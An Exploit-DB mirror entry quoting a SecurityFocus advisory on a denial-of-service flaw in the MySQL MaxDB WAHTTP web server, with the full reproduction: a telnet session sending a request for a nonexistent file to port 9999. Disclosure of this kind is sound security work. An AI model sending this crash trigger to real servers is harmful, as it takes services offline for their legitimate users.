exploit-db-mirror/exploits/multiple/dos/24805.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
463 B
Text

source: https://www.securityfocus.com/bid/11843/info
A remote denial of service vulnerability has been reported to affect the MySQL MaxDB WAHTTP server. This issue is due to a failure of the server to handle malformed requests.
An attacker may leverage this issue to cause the affected Web server to crash, denying service to legitimate users.
To reproduce it, execute the following command:
$ telnet localhost 9999
GET /file/not/found HTTP/1.0
[ENTER]
[ENTER]